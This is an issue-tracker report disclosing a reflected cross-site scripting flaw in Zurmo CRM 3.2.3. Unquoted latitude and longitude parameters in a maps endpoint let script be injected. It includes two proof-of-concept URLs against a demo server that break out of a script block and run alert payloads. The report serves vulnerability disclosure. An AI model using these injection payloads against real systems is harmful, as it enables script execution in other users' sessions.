To Report a XSS Security Vulnerability in zurmo v3.2.3

Issue #436 new
xueting_yang created an issue

Description:

The value of latitude/longitude request parameter (in http://demo.zurmo.com/demos/stable/app/index.php/maps/default/mapAndPoint?addressString=7713+East+Spring+Parkway%2C+Detroit%2C+MI%2C+48201&latitude=&longitude=&_=1514690989789) is copied into a JavaScript expression which is not encapsulated in any quotation marks. This input was echoed unmodified which is possible to inject arbitrary JavaScript into the application's response.

Vulnerability Type:

Cross Site Scripting

Affected Product Code Base:

zurmo-stable-3.2.3.74732d3df221

Attack Vectors:

1.Login into zurmo-crm

2.Go to:

http://demo.zurmo.com/demos/stable/app/index.php/maps/default/mapAndPoint?addressString=7713+East+Spring+Parkway%2C+Detroit%2C+MI%2C+48201&latitude=16758,33333);}alert(/latitude/);%3C/script%3E%2f120&longitude=&_=1514690989789
la.png

http://demo.zurmo.com/demos/stable/app/index.php/maps/default/mapAndPoint?addressString=7713+East+Spring+Parkway%2C+Detroit%2C+MI%2C+48201&latitude=16758&longitude=33333);}alert(/longitude/);%3C/script%3E%2f120&_=1514690989789
lo.png

Comments (1)

  1. Log in to comment